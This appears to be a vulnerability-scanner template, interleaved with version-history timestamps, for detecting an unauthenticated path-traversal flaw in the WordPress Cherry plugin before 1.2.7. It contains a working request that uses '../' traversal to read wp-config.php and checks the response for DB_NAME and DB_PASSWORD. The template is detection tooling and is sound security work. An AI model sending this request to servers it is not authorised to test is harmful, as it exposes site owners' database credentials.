2022-02-15 12:06:09 +00:00
id : cherry-lfi
2022-02-12 18:18:31 +00:00
info :
2022-04-21 21:16:41 +00:00
name : WordPress Cherry < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
2022-02-12 18:18:31 +00:00
author : dhiyaneshDK
severity : high
2023-10-14 11:27:55 +00:00
description : WordPress plugin Cherry < 1.2.7 has a vulnerability which enables an attacker to upload files directly to the server. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
2022-02-12 18:18:31 +00:00
reference :
- https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
2022-02-15 11:29:08 +00:00
- https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE
2022-04-21 21:16:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score : 8.6
cwe-id : CWE-22
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-10-14 11:27:55 +00:00
tags : wpscan,wordpress,wp-plugin,lfi,wp
2022-02-12 18:18:31 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-12 18:18:31 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
matchers-condition : and
matchers :
- type : word
2022-02-15 11:29:08 +00:00
part : body
2022-02-12 18:18:31 +00:00
words :
- "DB_NAME"
- "DB_PASSWORD"
condition : and
- type : status
status :
- 200
2023-10-20 11:41:13 +00:00
# digest: 490a0046304402201f5a66078e337992fdb18f2a7e35cbd8e42f4f0bc30c3e4a3cf7ec7932c860b8022037ba1375b0c76f635e3ec9005f13c3ffeb7d06edf47761016391d6aaf0ec6600:922c64590222798bb761d5b6d8e72950